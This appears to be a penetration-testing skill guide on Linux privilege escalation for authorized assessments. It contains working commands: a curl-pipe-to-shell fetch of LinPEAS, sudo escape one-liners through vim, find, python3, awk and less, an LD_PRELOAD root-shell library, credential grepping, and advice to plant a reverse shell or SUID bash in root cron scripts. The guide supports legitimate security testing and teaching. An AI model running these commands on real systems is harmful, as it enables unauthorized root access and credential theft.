Linux Privilege Complete

Perform systematic privilege escalation assessments on Linux systems to identify misconfigurations that allow escalation from unprivileged user to root. This skill covers SUID/SGID exploitation, sudo misconfigurations, cron job abuse, kernel exploits, capability exploitation, and container escape techniques for authorized penetration testing.

When to Use This Skill

Choose Linux Privilege Complete when you need to:

• Escalate privileges from a low-privileged shell during authorized penetration tests
• Audit Linux systems for privilege escalation vectors
• Identify misconfigured SUID binaries, sudo rules, and file permissions
• Test container security and breakout scenarios

Consider alternatives when:

• You need Windows privilege escalation (use Windows-specific techniques)
• You need Active Directory escalation (use AD Attacks Toolkit)
• You need to harden Linux systems defensively (use CIS benchmarks)

Quick Start

Copy
# Automated enumeration scripts (run from target system)
# LinPEAS — comprehensive Linux enumeration
curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Manual quick checks
echo "=== Current User ==="
id && whoami

echo "=== Sudo Permissions ==="
sudo -l 2>/dev/null

echo "=== SUID Binaries ==="
find / -perm -4000 -type f 2>/dev/null

echo "=== Writable /etc files ==="
find /etc -writable -type f 2>/dev/null

echo "=== Cron Jobs ==="
cat /etc/crontab 2>/dev/null
ls -la /etc/cron.d/ 2>/dev/null

echo "=== Running Processes ==="
ps aux | grep -v '\[' | head -20

echo "=== Kernel Version ==="
uname -a

Core Concepts

Privilege Escalation Vectors

Vector	Description	Likelihood
Sudo misconfig	sudo -l shows commands runnable as root	High
SUID/SGID binaries	Binaries with setuid/setgid bits	High
Writable scripts in PATH	Root executes scripts you can modify	Medium
Cron job abuse	Writable scripts executed by cron as root	Medium
Kernel exploits	Unpatched kernel vulnerabilities	Medium
Linux capabilities	Over-permissive file capabilities	Low-Medium
Docker/container escape	Privileged containers, socket access	Medium
NFS no_root_squash	NFS shares allowing root file creation	Low
Weak file permissions	World-readable secrets, writable configs	High
PATH hijacking	Relative command paths in privileged scripts	Medium

Sudo Exploitation Reference

Copy
# Check what commands can be run as root
sudo -l

# Common sudo escalation techniques:

# If sudo allows: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'

# If sudo allows: (ALL) NOPASSWD: /usr/bin/find
sudo find / -exec /bin/bash \; -quit

# If sudo allows: (ALL) NOPASSWD: /usr/bin/python3
sudo python3 -c 'import os; os.system("/bin/bash")'

# If sudo allows: (ALL) NOPASSWD: /usr/bin/less
sudo less /etc/shadow   # then type !bash

# If sudo allows: (ALL) NOPASSWD: /usr/bin/awk
sudo awk 'BEGIN {system("/bin/bash")}'

# If sudo allows: (ALL) NOPASSWD: /usr/bin/nmap (older versions)
sudo nmap --interactive   # then !sh

# If sudo allows: env_keep += LD_PRELOAD
# Compile shared library:
# gcc -fPIC -shared -o /tmp/preload.so preload.c -nostartfiles
# preload.c contains: void _init() { setuid(0); system("/bin/bash"); }
# sudo LD_PRELOAD=/tmp/preload.so /usr/bin/any_allowed_command

# Check GTFOBins for any binary: https://gtfobins.github.io/

Configuration

Parameter	Description	Default
enumeration_tool	Automated enum script (linpeas, linenum)	"linpeas"
check_kernel	Check for kernel exploits	true
check_suid	Enumerate SUID/SGID binaries	true
check_sudo	Check sudo configuration	true
check_cron	Enumerate cron jobs	true
check_capabilities	Check file capabilities	true
check_containers	Check for container escape	true
exploit_suggest	Suggest kernel exploits based on version	true

Best Practices

1. Always start with sudo -l and SUID enumeration — These are the most common and reliable escalation vectors. Over 50% of Linux privilege escalation in real engagements comes from misconfigured sudo rules or SUID binaries. Check GTFOBins for exploitation techniques for each binary found.

2. Search for credentials in files before attempting exploits — Check .bash_history, config files, environment variables, and backup files for passwords. grep -r 'password' /home /var/www /opt 2>/dev/null often finds credentials that directly grant root access without any exploitation.

3. Check for writable scripts executed by privileged processes — If a root cron job executes /opt/backup.sh and you can write to that file, inject a reverse shell or chmod +s /bin/bash. Use pspy to monitor processes if you can't read crontab directly.

4. Verify kernel exploit reliability before running — Kernel exploits can crash the system. Check the exact kernel version (uname -r), distribution, and architecture before running any kernel exploit. Use linux-exploit-suggester to identify applicable exploits and always test in a lab first.

5. Document the full escalation chain — Record every step from initial access to root, including the exact commands used. This helps the client understand the attack path and prioritize which misconfigurations to fix first. A reproducible escalation chain is more valuable than a list of findings.

Common Issues

SUID binary is not in GTFOBins — Custom or uncommon SUID binaries may still be exploitable. Check if the binary reads files (read /etc/shadow), writes files (write to /etc/passwd), or executes commands (command injection). Use ltrace and strace to understand the binary's behavior.

Sudo requires a password you don't know — Focus on SUID binaries, cron jobs, and writable files instead. If you have write access to files read by privileged processes, you can still escalate. Also check if the user has been added to groups (docker, lxd, disk) that grant implicit root access.

Kernel exploit compilation fails on target — The target may lack gcc. Cross-compile on a machine with the same architecture and kernel headers, then transfer the binary. Alternatively, use pre-compiled exploits matched to the exact kernel version.